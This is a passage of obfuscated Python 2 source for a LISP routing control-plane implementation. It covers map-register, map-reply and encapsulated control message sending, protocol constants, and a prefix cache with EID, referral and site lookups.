if 37 - 37: iII111i
if 27 - 27: iII111i / Ii1I / iII111i + OoooooooOO - O0 + OoO0O00
if 62 - 62: iIii1I11I1II1
OO00OOoOoOo = O0O00O . udp_sport
lisp_process_map_request ( lisp_sockets , packet , source , ecm_port ,
O0O00O . source , OO00OOoOoOo , O0O00O . ddt , - 1 )
return
if 17 - 17: OOooOOo % i11iIiiIii
if 63 - 63: I1ii11iIi11i + I1ii11iIi11i % Ii1I + II111iiii / OoooooooOO / I1IiiI
if 64 - 64: Oo0Ooo / OOooOOo * II111iiii
if 70 - 70: OoOoOO00 - I11i
if 50 - 50: I1ii11iIi11i
if 9 - 9: I11i % I11i . OoOoOO00 / OOooOOo / OoooooooOO
if 21 - 21: O0 . I1Ii111
if 2 - 2: O0 % OoOoOO00 + oO0o
if 24 - 24: iII111i + iII111i - OoooooooOO % OoooooooOO * O0
if 51 - 51: IiII
def lisp_send_map_register ( lisp_sockets , packet , map_register , ms ) :
if 31 - 31: I11i - iIii1I11I1II1 * Ii1I + Ii1I
if 10 - 10: OoOoOO00 - i11iIiiIii % iIii1I11I1II1 / ooOoO0o * i11iIiiIii - Ii1I
if 64 - 64: II111iiii . i11iIiiIii . iII111i . OOooOOo
if 95 - 95: O0 - OoOoOO00
if 68 - 68: ooOoO0o . I1Ii111
if 84 - 84: OoooooooOO + oO0o % i1IIi + o0oOOo0O0Ooo * i1IIi
if 51 - 51: oO0o . OoooooooOO + OOooOOo * I1ii11iIi11i - ooOoO0o
oO00o0oOoo = ms . map_server
if ( lisp_decent_push_configured and oO00o0oOoo . is_multicast_address ( ) and
( ms . map_registers_multicast_sent == 1 or ms . map_registers_sent == 1 ) ) :
oO00o0oOoo = copy . deepcopy ( oO00o0oOoo )
oO00o0oOoo . address = 0x7f000001
iIIi1iI1I1IIi = bold ( "Bootstrap" , False )
II1IIiIiiI1iI = ms . map_server . print_address_no_iid ( )
lprint ( "{} mapping system for peer-group {}" . format ( iIIi1iI1I1IIi , II1IIiIiiI1iI ) )
if 41 - 41: Oo0Ooo
if 46 - 46: i11iIiiIii + iIii1I11I1II1 . i11iIiiIii . iII111i
if 66 - 66: oO0o % i1IIi % OoooooooOO
if 58 - 58: OOooOOo
if 89 - 89: iIii1I11I1II1 - i1IIi
if 26 - 26: OOooOOo - iII111i * I1ii11iIi11i / iII111i
packet = lisp_compute_auth ( packet , map_register , ms . password )
if 9 - 9: I1Ii111 / II111iiii * I1Ii111 / I11i - OoO0O00
if 36 - 36: IiII . OoOoOO00 . Ii1I
if 31 - 31: iIii1I11I1II1
if 84 - 84: I1ii11iIi11i - iII111i * I1IiiI
if 88 - 88: OOooOOo / Oo0Ooo
if ( ms . ekey != None ) :
iI1Ii1iiiII1II = ms . ekey . zfill ( 32 )
oo0O = "0" * 8
i1I1i = chacha . ChaCha ( iI1Ii1iiiII1II , oo0O ) . encrypt ( packet [ 4 : : ] )
packet = packet [ 0 : 4 ] + i1I1i
o0OoO00 = bold ( "Encrypt" , False )
lprint ( "{} Map-Register with key-id {}" . format ( o0OoO00 , ms . ekey_id ) )
if 31 - 31: II111iiii
if 32 - 32: o0oOOo0O0Ooo % o0oOOo0O0Ooo
o00O0o = ""
if ( lisp_decent_pull_xtr_configured ( ) ) :
o00O0o = ", decent-index {}" . format ( bold ( ms . dns_name , False ) )
if 99 - 99: OoooooooOO - I1ii11iIi11i / i1IIi
if 44 - 44: I1IiiI * oO0o - OoOoOO00 + ooOoO0o
lprint ( "Send Map-Register to map-server {}{}{}" . format ( oO00o0oOoo . print_address ( ) , ", ms-name '{}'" . format ( ms . ms_name ) , o00O0o ) )
if 75 - 75: ooOoO0o % OoooooooOO / OoooooooOO / Ii1I / I11i % IiII
lisp_send ( lisp_sockets , oO00o0oOoo , LISP_CTRL_PORT , packet )
return
if 68 - 68: II111iiii . iIii1I11I1II1
if 23 - 23: iIii1I11I1II1 + I1Ii111 + I1IiiI - i11iIiiIii % IiII % i1IIi
if 24 - 24: OOooOOo - OoOoOO00 - i1IIi + O0 + I1IiiI . o0oOOo0O0Ooo
if 97 - 97: I1Ii111 + Ii1I * ooOoO0o
if 95 - 95: O0
if 61 - 61: Oo0Ooo % O0 . Ii1I - OOooOOo - o0oOOo0O0Ooo
if 71 - 71: iIii1I11I1II1
if 10 - 10: OoooooooOO - iII111i . i1IIi % oO0o . OoooooooOO + OOooOOo
def lisp_send_ipc_to_core ( lisp_socket , packet , dest , port ) :
O0O00Oo = lisp_socket . getsockname ( )
dest = dest . print_address_no_iid ( )
if 59 - 59: I1IiiI * OoooooooOO % OOooOOo / I11i
lprint ( "Send IPC {} bytes to {} {}, control-packet: {}" . format ( len ( packet ) , dest , port , lisp_format_packet ( packet ) ) )
if 77 - 77: II111iiii - IiII % OOooOOo
if 22 - 22: OoooooooOO / oO0o
packet = lisp_control_packet_ipc ( packet , O0O00Oo , dest , port )
lisp_ipc ( packet , lisp_socket , "lisp-core-pkt" )
return
if 78 - 78: oO0o * I11i . i1IIi % i1IIi + i1IIi / OOooOOo
if 66 - 66: OoooooooOO % o0oOOo0O0Ooo / I11i * I1Ii111
if 12 - 12: I1Ii111
if 17 - 17: I1Ii111 % oO0o + O0
if 15 - 15: o0oOOo0O0Ooo - OoooooooOO % ooOoO0o % oO0o / i11iIiiIii / Oo0Ooo
if 59 - 59: iII111i + O0 - I1ii11iIi11i * I1ii11iIi11i + iIii1I11I1II1
if 41 - 41: iIii1I11I1II1 . O0 - ooOoO0o / OoOoOO00 % iIii1I11I1II1 + IiII
if 23 - 23: OoOoOO00 + ooOoO0o . i11iIiiIii
def lisp_send_map_reply ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Reply to {}" . format ( dest . print_address_no_iid ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 39 - 39: OoOoOO00 - I1ii11iIi11i / I1Ii111
if 48 - 48: IiII - oO0o + I11i % o0oOOo0O0Ooo
if 81 - 81: Oo0Ooo . I1Ii111 * iIii1I11I1II1
if 60 - 60: OoooooooOO
if 41 - 41: iIii1I11I1II1 + O0 % o0oOOo0O0Ooo - IiII . I11i * O0
if 39 - 39: i11iIiiIii . Ii1I
if 68 - 68: OOooOOo * ooOoO0o . I1IiiI - iII111i
if 81 - 81: I11i % Oo0Ooo / iII111i
def lisp_send_map_referral ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Referral to {}" . format ( dest . print_address ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 44 - 44: Oo0Ooo
if 90 - 90: Oo0Ooo . ooOoO0o / IiII * I1Ii111 . ooOoO0o + II111iiii
if 43 - 43: iIii1I11I1II1 % OOooOOo + OoOoOO00 + I1ii11iIi11i - Oo0Ooo / Ii1I
if 94 - 94: Ii1I / Oo0Ooo % II111iiii % Oo0Ooo * oO0o
if 54 - 54: O0 / ooOoO0o * I1Ii111
if 5 - 5: Ii1I / OoOoOO00 - O0 * OoO0O00
if 13 - 13: IiII + Oo0Ooo - I1Ii111
if 10 - 10: OOooOOo % OoooooooOO / I1IiiI . II111iiii % iII111i
def lisp_send_map_notify ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Notify to xTR {}" . format ( dest . print_address ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 47 - 47: o0oOOo0O0Ooo . i11iIiiIii * i1IIi % I11i - ooOoO0o * oO0o
if 95 - 95: oO0o / Ii1I + OoO0O00
if 57 - 57: iIii1I11I1II1 + I1Ii111 % oO0o - Ii1I . I1IiiI
if 39 - 39: OoO0O00 + II111iiii
if 98 - 98: O0 - I1Ii111 % oO0o - iII111i + Ii1I * i1IIi
if 76 - 76: o0oOOo0O0Ooo
if 55 - 55: OOooOOo + I1ii11iIi11i * Oo0Ooo
def lisp_send_ecm ( lisp_sockets , packet , inner_source , inner_sport , inner_dest ,
outer_dest , to_etr = False , to_ms = False , ddt = False ) :
if 11 - 11: i1IIi - OoooooooOO * OoOoOO00 / oO0o - OoooooooOO - I1IiiI
if ( inner_source == None or inner_source . is_null ( ) ) :
inner_source = inner_dest
if 22 - 22: i11iIiiIii . Ii1I . Oo0Ooo * Oo0Ooo - iII111i / I1ii11iIi11i
if 49 - 49: iII111i + I11i . Oo0Ooo
if 23 - 23: I1IiiI . Ii1I + ooOoO0o . OoooooooOO
if 57 - 57: OOooOOo / OoOoOO00 / i11iIiiIii - I11i - I11i . Ii1I
if 53 - 53: ooOoO0o . iII111i + Ii1I * I1Ii111
if 49 - 49: II111iiii . I1ii11iIi11i * OoOoOO00 - OOooOOo
if ( lisp_nat_traversal ) :
O0o0oOOO = lisp_get_any_translated_port ( )
if ( O0o0oOOO != None ) : inner_sport = O0o0oOOO
if 48 - 48: OoO0O00 . iIii1I11I1II1 - OoooooooOO + I1Ii111 / i11iIiiIii . Oo0Ooo
O0O00O = lisp_ecm ( inner_sport )
if 61 - 61: II111iiii + OOooOOo . o0oOOo0O0Ooo . iIii1I11I1II1
O0O00O . to_etr = to_etr if lisp_is_running ( "lisp-etr" ) else False
O0O00O . to_ms = to_ms if lisp_is_running ( "lisp-ms" ) else False
O0O00O . ddt = ddt
O0oooO = O0O00O . encode ( packet , inner_source , inner_dest )
if ( O0oooO == None ) :
lprint ( "Could not encode ECM message" )
return
if 34 - 34: i11iIiiIii + O0
O0O00O . print_ecm ( )
if 3 - 3: iIii1I11I1II1
packet = O0oooO + packet
if 15 - 15: Oo0Ooo / IiII % i11iIiiIii * I11i . iIii1I11I1II1
oOo0O = outer_dest . print_address_no_iid ( )
lprint ( "Send Encapsulated-Control-Message to {}" . format ( oOo0O ) )
oO00o0oOoo = lisp_convert_4to6 ( oOo0O )
lisp_send ( lisp_sockets , oO00o0oOoo , LISP_CTRL_PORT , packet )
return
if 97 - 97: I1Ii111
if 55 - 55: Oo0Ooo
if 20 - 20: i11iIiiIii - Oo0Ooo
if 47 - 47: iII111i * ooOoO0o . I1IiiI / O0
if 81 - 81: iII111i + I11i - I1ii11iIi11i + iIii1I11I1II1 / ooOoO0o
if 60 - 60: iIii1I11I1II1 - OoO0O00
if 11 - 11: IiII + I1IiiI . Ii1I * I1IiiI - OoooooooOO . II111iiii
LISP_AFI_GEO_COORD = - 3
LISP_AFI_IID_RANGE = - 2
LISP_AFI_ULTIMATE_ROOT = - 1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
if 74 - 74: o0oOOo0O0Ooo . iIii1I11I1II1 * Ii1I / O0 - I1Ii111 % oO0o
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
if 98 - 98: IiII
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
if 30 - 30: iIii1I11I1II1 - ooOoO0o / iIii1I11I1II1 / I1IiiI + OoOoOO00 - iIii1I11I1II1
if 69 - 69: i11iIiiIii . O0
if 21 - 21: i1IIi . OoO0O00 % I11i + II111iiii % o0oOOo0O0Ooo
if 17 - 17: i11iIiiIii + oO0o * iII111i . II111iiii
if 44 - 44: I1ii11iIi11i
if 39 - 39: iII111i + Oo0Ooo / oO0o
if 95 - 95: I1Ii111 * oO0o / ooOoO0o . Ii1I . OoOoOO00
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
if 99 - 99: I1IiiI * II111iiii
if 84 - 84: II111iiii - I1IiiI
if 41 - 41: iIii1I11I1II1 % I1Ii111 % OoOoOO00
if 35 - 35: I11i + i1IIi
if 85 - 85: Ii1I * Ii1I . OoOoOO00 / Oo0Ooo
if 97 - 97: oO0o % iIii1I11I1II1
def byte_swap_64 ( address ) :
O0o00o000oO = ( ( address & 0x00000000000000ff ) << 56 ) | ( ( address & 0x000000000000ff00 ) << 40 ) | ( ( address & 0x0000000000ff0000 ) << 24 ) | ( ( address & 0x00000000ff000000 ) << 8 ) | ( ( address & 0x000000ff00000000 ) >> 8 ) | ( ( address & 0x0000ff0000000000 ) >> 24 ) | ( ( address & 0x00ff000000000000 ) >> 40 ) | ( ( address & 0xff00000000000000 ) >> 56 )
if 87 - 87: II111iiii % I1IiiI + oO0o - I11i / I11i
if 16 - 16: I1IiiI
if 39 - 39: ooOoO0o * II111iiii
if 90 - 90: OoooooooOO * ooOoO0o
if 14 - 14: I1IiiI % i1IIi
if 35 - 35: ooOoO0o % o0oOOo0O0Ooo % ooOoO0o
if 77 - 77: OOooOOo % I1Ii111 / i11iIiiIii . i1IIi % OOooOOo
if 55 - 55: i1IIi
return ( O0o00o000oO )
if 64 - 64: oO0o . OOooOOo * i11iIiiIii + I1Ii111
if 88 - 88: O0
if 75 - 75: iII111i - Oo0Ooo / OoooooooOO - O0
if 36 - 36: OoO0O00 % Ii1I . Oo0Ooo
if 90 - 90: i11iIiiIii - iII111i * oO0o
if 79 - 79: IiII
if 38 - 38: I1Ii111
if 56 - 56: i11iIiiIii
if 58 - 58: i11iIiiIii / OoOoOO00
if 23 - 23: I1IiiI % iIii1I11I1II1 - oO0o - iII111i - o0oOOo0O0Ooo
if 39 - 39: Oo0Ooo . OoO0O00
if 74 - 74: I1IiiI . O0 . IiII + IiII - IiII
if 100 - 100: ooOoO0o / OoooooooOO
if 73 - 73: i11iIiiIii - Oo0Ooo
if 100 - 100: iIii1I11I1II1 + I1Ii111
class lisp_cache_entries ( ) :
def __init__ ( self ) :
self . entries = { }
self . entries_sorted = [ ]
if 51 - 51: o0oOOo0O0Ooo * I11i
if 42 - 42: OOooOOo % I11i
if 84 - 84: Oo0Ooo * OoOoOO00 / Ii1I / IiII / o0oOOo0O0Ooo . I1ii11iIi11i
class lisp_cache ( ) :
def __init__ ( self ) :
self . cache = { }
self . cache_sorted = [ ]
self . cache_count = 0
if 81 - 81: I1IiiI
if 82 - 82: I1Ii111 - OoooooooOO - Ii1I
def cache_size ( self ) :
return ( self . cache_count )
if 34 - 34: OOooOOo . iIii1I11I1II1 / I1IiiI . Oo0Ooo - iIii1I11I1II1
if 83 - 83: iII111i - I1ii11iIi11i + iII111i
def build_key ( self , prefix ) :
if ( prefix . afi == LISP_AFI_ULTIMATE_ROOT ) :
O0ooOo = 0
elif ( prefix . afi == LISP_AFI_IID_RANGE ) :
O0ooOo = prefix . mask_len
else :
O0ooOo = prefix . mask_len + 48
if 4 - 4: o0oOOo0O0Ooo % iIii1I11I1II1 + I11i
if 60 - 60: I1ii11iIi11i / I1Ii111 % i11iIiiIii % oO0o % I1IiiI . Oo0Ooo
oOo00Ooo0o0 = lisp_hex_string ( prefix . instance_id ) . zfill ( 8 )
oO0oO00 = lisp_hex_string ( prefix . afi ) . zfill ( 4 )
if 20 - 20: IiII - OOooOOo + OoOoOO00
if ( prefix . afi > 0 ) :
if ( prefix . is_binary ( ) ) :
iI1 = prefix . addr_length ( ) * 2
O0o00o000oO = lisp_hex_string ( prefix . address ) . zfill ( iI1 )
else :
O0o00o000oO = prefix . address
if 83 - 83: OoooooooOO / I1IiiI + iII111i - iIii1I11I1II1 % ooOoO0o
elif ( prefix . afi == LISP_AFI_GEO_COORD ) :
oO0oO00 = "8003"
O0o00o000oO = prefix . address . print_geo ( )
else :
oO0oO00 = ""
O0o00o000oO = ""
if 74 - 74: OoO0O00
if 13 - 13: I1ii11iIi11i / OoO0O00
iII1 = oOo00Ooo0o0 + oO0oO00 + O0o00o000oO
return ( [ O0ooOo , iII1 ] )
if 90 - 90: iIii1I11I1II1 - OoO0O00 . i1IIi / o0oOOo0O0Ooo + O0
if 94 - 94: IiII * i1IIi
def add_cache ( self , prefix , entry ) :
if ( prefix . is_binary ( ) ) : prefix . zero_host_bits ( )
O0ooOo , iII1 = self . build_key ( prefix )
if ( self . cache . has_key ( O0ooOo ) == False ) :
self . cache [ O0ooOo ] = lisp_cache_entries ( )
self . cache [ O0ooOo ] . entries = { }
self . cache [ O0ooOo ] . entries_sorted = [ ]
self . cache_sorted = sorted ( self . cache )
if 90 - 90: O0 % I1IiiI . o0oOOo0O0Ooo % ooOoO0o % I1IiiI
if ( self . cache [ O0ooOo ] . entries . has_key ( iII1 ) == False ) :
self . cache_count += 1
if 16 - 16: OoO0O00 / OOooOOo / iIii1I11I1II1 / OoooooooOO . oO0o - I1Ii111
self . cache [ O0ooOo ] . entries [ iII1 ] = entry
self . cache [ O0ooOo ] . entries_sorted = sorted ( self . cache [ O0ooOo ] . entries )
if 43 - 43: OoOoOO00 % OOooOOo / I1IiiI + I1IiiI
if 40 - 40: OOooOOo . I1Ii111 + I1Ii111
def lookup_cache ( self , prefix , exact ) :
ii1i1i1Ii , iII1 = self . build_key ( prefix )
if ( exact ) :
if ( self . cache . has_key ( ii1i1i1Ii ) == False ) : return ( None )
if ( self . cache [ ii1i1i1Ii ] . entries . has_key ( iII1 ) == False ) : return ( None )
return ( self . cache [ ii1i1i1Ii ] . entries [ iII1 ] )
if 87 - 87: iII111i + i1IIi
if 10 - 10: Oo0Ooo . o0oOOo0O0Ooo - i11iIiiIii / iII111i + i11iIiiIii . I11i
OO0Oo0Oo = None
for O0ooOo in self . cache_sorted :
if ( ii1i1i1Ii < O0ooOo ) : return ( OO0Oo0Oo )
for o0oo in self . cache [ O0ooOo ] . entries_sorted :
iiIi1 = self . cache [ O0ooOo ] . entries
if ( o0oo in iiIi1 ) :
iIiiiIIiii = iiIi1 [ o0oo ]
if ( iIiiiIIiii == None ) : continue
if ( prefix . is_more_specific ( iIiiiIIiii . eid ) ) : OO0Oo0Oo = iIiiiIIiii
if 40 - 40: iII111i * I11i
if 25 - 25: O0 * o0oOOo0O0Ooo % ooOoO0o % I1IiiI
if 87 - 87: OoOoOO00
return ( OO0Oo0Oo )
if 30 - 30: IiII % OoOoOO00 + I1Ii111
if 13 - 13: iII111i * Ii1I % o0oOOo0O0Ooo * i1IIi . IiII % i1IIi
def delete_cache ( self , prefix ) :
O0ooOo , iII1 = self . build_key ( prefix )
if ( self . cache . has_key ( O0ooOo ) == False ) : return
if ( self . cache [ O0ooOo ] . entries . has_key ( iII1 ) == False ) : return
self . cache [ O0ooOo ] . entries . pop ( iII1 )
self . cache [ O0ooOo ] . entries_sorted . remove ( iII1 )
self . cache_count -= 1
if 79 - 79: OoooooooOO % I11i / o0oOOo0O0Ooo + IiII + O0 + iII111i
if 87 - 87: I11i
def walk_cache ( self , function , parms ) :
for O0ooOo in self . cache_sorted :
for iII1 in self . cache [ O0ooOo ] . entries_sorted :
iIiiiIIiii = self . cache [ O0ooOo ] . entries [ iII1 ]
iI1i11I1III11 , parms = function ( iIiiiIIiii , parms )
if ( iI1i11I1III11 == False ) : return ( parms )
if 14 - 14: II111iiii / I11i . OOooOOo . Ii1I . II111iiii
if 57 - 57: i1IIi - Ii1I - i11iIiiIii . O0
return ( parms )
if 67 - 67: I1Ii111
if 49 - 49: IiII / i1IIi . OOooOOo
def print_cache ( self ) :
lprint ( "Printing contents of {}: " . format ( self ) )
if ( self . cache_size ( ) == 0 ) :
lprint ( " Cache is empty" )
return
if 64 - 64: O0
for O0ooOo in self . cache_sorted :
for iII1 in self . cache [ O0ooOo ] . entries_sorted :
iIiiiIIiii = self . cache [ O0ooOo ] . entries [ iII1 ]
lprint ( " Mask-length: {}, key: {}, entry: {}" . format ( O0ooOo , iII1 ,
iIiiiIIiii ) )
if 10 - 10: I1ii11iIi11i % ooOoO0o * IiII - iIii1I11I1II1
if 42 - 42: iII111i
if 96 - 96: OoO0O00 + o0oOOo0O0Ooo . ooOoO0o
if 44 - 44: I11i * iIii1I11I1II1 . I1ii11iIi11i
if 9 - 9: o0oOOo0O0Ooo
if 23 - 23: ooOoO0o * OoO0O00 + O0 % I1Ii111
if 21 - 21: Ii1I * OoOoOO00
if 29 - 29: iIii1I11I1II1 / ooOoO0o
lisp_referral_cache = lisp_cache ( )
lisp_ddt_cache = lisp_cache ( )
lisp_sites_by_eid = lisp_cache ( )
lisp_map_cache = lisp_cache ( )
lisp_db_for_lookups = lisp_cache ( )
if 75 - 75: OoooooooOO + I1IiiI % OoOoOO00 / O0 - IiII
if 88 - 88: OoO0O00 % Ii1I
if 12 - 12: OoooooooOO . O0
if 33 - 33: OoooooooOO / I11i . II111iiii * i1IIi
if 34 - 34: i11iIiiIii / OoOoOO00
if 100 - 100: o0oOOo0O0Ooo - I1IiiI / I11i
if 43 - 43: o0oOOo0O0Ooo % iIii1I11I1II1
def lisp_map_cache_lookup ( source , dest ) :
if 85 - 85: oO0o + OoooooooOO - IiII % o0oOOo0O0Ooo * ooOoO0o * II111iiii
O0O0OOoO00 = dest . is_multicast_address ( )
if 4 - 4: Ii1I . i1IIi + Oo0Ooo % I11i . OoO0O00
if 70 - 70: OOooOOo * OoOoOO00 / OoOoOO00 / OoOoOO00
if 23 - 23: I1IiiI
if 24 - 24: I1Ii111 * i1IIi % O0 * Ii1I + iII111i
OoOoooooO00oo = lisp_map_cache . lookup_cache ( dest , False )
if ( OoOoooooO00oo == None ) :
iiI1Ii1I = source . print_sg ( dest ) if O0O0OOoO00 else dest . print_address ( )
iiI1Ii1I = green ( iiI1Ii1I , False )
dprint ( "Lookup for EID {} not found in map-cache" . format ( iiI1Ii1I ) )
return ( None )
if 14 - 14: oO0o * iII111i + Ii1I + Ii1I * IiII
if 82 - 82: IiII * ooOoO0o / OOooOOo + OoOoOO00
if 32 - 32: IiII
if 90 - 90: I1ii11iIi11i / I11i * o0oOOo0O0Ooo % O0 * i11iIiiIii
if 68 - 68: I11i . Ii1I + I11i / IiII . I11i / iIii1I11I1II1
if ( O0O0OOoO00 == False ) :
OOo0I111I = green ( OoOoooooO00oo . eid . print_prefix ( ) , False )
dprint ( "Lookup for EID {} found map-cache entry {}" . format ( green ( dest . print_address ( ) , False ) , OOo0I111I ) )
if 96 - 96: O0
return ( OoOoooooO00oo )
if 2 - 2: OoO0O00 / iII111i + o0oOOo0O0Ooo
if 27 - 27: I11i - OoOoOO00 - ooOoO0o - I1IiiI
if 51 - 51: I11i + I11i + O0 + O0 * I1Ii111
if 61 - 61: IiII . O0
if 38 - 38: Ii1I * I1ii11iIi11i - i11iIiiIii + ooOoO0o * I11i
OoOoooooO00oo = OoOoooooO00oo . lookup_source_cache ( source , False )
if ( OoOoooooO00oo == None ) :
iiI1Ii1I = source . print_sg ( dest )
dprint ( "Lookup for EID {} not found in map-cache" . format ( iiI1Ii1I ) )
return ( None )
if 74 - 74: OoOoOO00 . o0oOOo0O0Ooo
if 40 - 40: ooOoO0o + I1ii11iIi11i * i11iIiiIii / i1IIi
if 95 - 95: oO0o / IiII * II111iiii * Ii1I . OoO0O00 . OoO0O00
if 85 - 85: I1IiiI / II111iiii * OoO0O00 + ooOoO0o / OoO0O00 % OOooOOo
if 100 - 100: I1Ii111 % OoooooooOO % OoOoOO00 % I1IiiI
OOo0I111I = green ( OoOoooooO00oo . print_eid_tuple ( ) , False )
dprint ( "Lookup for EID {} found map-cache entry {}" . format ( green ( source . print_sg ( dest ) , False ) , OOo0I111I ) )
if 32 - 32: OoO0O00 + OOooOOo . OoO0O00 - Oo0Ooo
return ( OoOoooooO00oo )
if 12 - 12: I1IiiI * OoO0O00 - II111iiii . i1IIi
if 86 - 86: OOooOOo / OoooooooOO - IiII
if 56 - 56: I1ii11iIi11i - i1IIi * OoooooooOO * O0 * I1IiiI - I1Ii111
if 32 - 32: OoooooooOO . OOooOOo . OoO0O00 . IiII / I11i % i1IIi
if 21 - 21: O0 . OoO0O00 * I1ii11iIi11i % iII111i + OoooooooOO
if 8 - 8: oO0o * iII111i * I11i
if 30 - 30: I1Ii111
def lisp_referral_cache_lookup ( eid , group , exact ) :
if ( group and group . is_null ( ) ) :
iiiI11i1ii1i = lisp_referral_cache . lookup_cache ( eid , exact )
return ( iiiI11i1ii1i )
if 61 - 61: iII111i
if 50 - 50: Ii1I / I1IiiI . O0
if 49 - 49: I1Ii111 . OoO0O00 % O0
if 15 - 15: I11i - Oo0Ooo / I1Ii111 . ooOoO0o % I1IiiI
if 62 - 62: II111iiii + ooOoO0o + I1IiiI
if ( eid == None or eid . is_null ( ) ) : return ( None )
if 70 - 70: o0oOOo0O0Ooo + Ii1I . OoO0O00 * Ii1I + OOooOOo + ooOoO0o
if 13 - 13: I1ii11iIi11i
if 97 - 97: oO0o - Oo0Ooo . i11iIiiIii % ooOoO0o * i11iIiiIii - OoooooooOO
if 44 - 44: I11i % OoooooooOO / iII111i - i11iIiiIii * i1IIi * o0oOOo0O0Ooo
if 51 - 51: Ii1I + IiII / I1ii11iIi11i + O0 % Ii1I
if 55 - 55: iII111i % o0oOOo0O0Ooo - oO0o % OoooooooOO
iiiI11i1ii1i = lisp_referral_cache . lookup_cache ( group , exact )
if ( iiiI11i1ii1i == None ) : return ( None )
if 18 - 18: OoooooooOO - I1ii11iIi11i
O0i1I1iI1Iiii1I = iiiI11i1ii1i . lookup_source_cache ( eid , exact )
if ( O0i1I1iI1Iiii1I ) : return ( O0i1I1iI1Iiii1I )
if 21 - 21: iIii1I11I1II1 . ooOoO0o / II111iiii + OoO0O00 . i1IIi / Ii1I
if ( exact ) : iiiI11i1ii1i = None
return ( iiiI11i1ii1i )
if 74 - 74: II111iiii
if 91 - 91: oO0o % II111iiii / I1ii11iIi11i
if 66 - 66: iII111i / OoO0O00 / i11iIiiIii
if 99 - 99: OOooOOo
if 51 - 51: i11iIiiIii . o0oOOo0O0Ooo / iII111i
if 53 - 53: oO0o / i1IIi - Oo0Ooo - i1IIi + IiII
if 79 - 79: oO0o % o0oOOo0O0Ooo / o0oOOo0O0Ooo % iII111i
def lisp_ddt_cache_lookup ( eid , group , exact ) :
if ( group . is_null ( ) ) :
OO = lisp_ddt_cache . lookup_cache ( eid , exact )
return ( OO )
if 56 - 56: Oo0Ooo % I1ii11iIi11i
if 53 - 53: OoO0O00 . I11i - ooOoO0o
if 11 - 11: I11i + i11iIiiIii / oO0o % oO0o * o0oOOo0O0Ooo / OoOoOO00
if 74 - 74: oO0o . I1Ii111 . II111iiii
if 92 - 92: I1Ii111 % OoooooooOO * I1Ii111
if ( eid . is_null ( ) ) : return ( None )
if 78 - 78: Oo0Ooo . I11i . oO0o + O0 / O0
if 41 - 41: iII111i * OoO0O00 - OoO0O00
if 72 - 72: o0oOOo0O0Ooo + oO0o . I1ii11iIi11i + OoO0O00 / I1Ii111
if 58 - 58: Oo0Ooo / II111iiii % OoooooooOO % II111iiii
if 39 - 39: i1IIi
if 16 - 16: OoOoOO00 % iIii1I11I1II1 + Ii1I - o0oOOo0O0Ooo . Oo0Ooo + i1IIi
OO = lisp_ddt_cache . lookup_cache ( group , exact )
if ( OO == None ) : return ( None )
if 59 - 59: i1IIi
iIiII = OO . lookup_source_cache ( eid , exact )
if ( iIiII ) : return ( iIiII )
if 15 - 15: I1IiiI % iIii1I11I1II1 . I1Ii111
if ( exact ) : OO = None
return ( OO )
if 71 - 71: I11i - Ii1I + i11iIiiIii % I1ii11iIi11i - OoO0O00 - OOooOOo
if 71 - 71: OOooOOo
if 27 - 27: OOooOOo * O0 * i11iIiiIii / OoOoOO00 - i1IIi
if 73 - 73: iII111i / I1IiiI * ooOoO0o
if 85 - 85: I11i + I11i + oO0o - OoOoOO00
if 15 - 15: OoO0O00
if 88 - 88: Ii1I % i1IIi / I1Ii111
def lisp_site_eid_lookup ( eid , group , exact ) :
if 2 - 2: Ii1I . IiII % OoOoOO00
if ( group . is_null ( ) ) :
O0oiiii1i1i11I = lisp_sites_by_eid . lookup_cache ( eid , exact )
return ( O0oiiii1i1i11I )
if 42 - 42: OoOoOO00 * OoO0O00 * IiII - IiII % Oo0Ooo . IiII
if 38 - 38: I1Ii111 . IiII - ooOoO0o . i11iIiiIii
if 35 - 35: i11iIiiIii
if 62 - 62: O0 - o0oOOo0O0Ooo + I1Ii111 * I1ii11iIi11i / OOooOOo
if 87 - 87: Oo0Ooo / OoooooooOO + O0 / o0oOOo0O0Ooo % II111iiii - O0
if ( eid . is_null ( ) ) : return ( None )
if 63 - 63: OOooOOo - OoO0O00 * i1IIi - I1ii11iIi11i . I1IiiI
if 59 - 59: i11iIiiIii . OOooOOo % Oo0Ooo + O0
if 84 - 84: I1Ii111 / O0 - IiII . I11i / o0oOOo0O0Ooo
if 12 - 12: i11iIiiIii / Ii1I + i1IIi
if 54 - 54: I1IiiI
if 55 - 55: I1ii11iIi11i % IiII % o0oOOo0O0Ooo + i1IIi * OoooooooOO % II111iiii
O0oiiii1i1i11I = lisp_sites_by_eid . lookup_cache ( group , exact )
if ( O0oiiii1i1i11I == None ) : return ( None )
if 37 - 37: Oo0Ooo
if 33 - 33: OoooooooOO - O0 . O0 - o0oOOo0O0Ooo % o0oOOo0O0Ooo % OoO0O00
if 27 - 27: ooOoO0o . i11iIiiIii / o0oOOo0O0Ooo * OoO0O00 * OoOoOO00 * oO0o
if 19 - 19: O0 * II111iiii * OoOoOO00
if 53 - 53: Oo0Ooo
if 16 - 16: Ii1I
if 73 - 73: i11iIiiIii + I1IiiI - IiII - IiII + IiII . Ii1I
if 78 - 78: OoO0O00 + oO0o
if 86 - 86: ooOoO0o . ooOoO0o + oO0o
if 84 - 84: OOooOOo - OoOoOO00 + i1IIi * I1ii11iIi11i % I1ii11iIi11i * I1Ii111
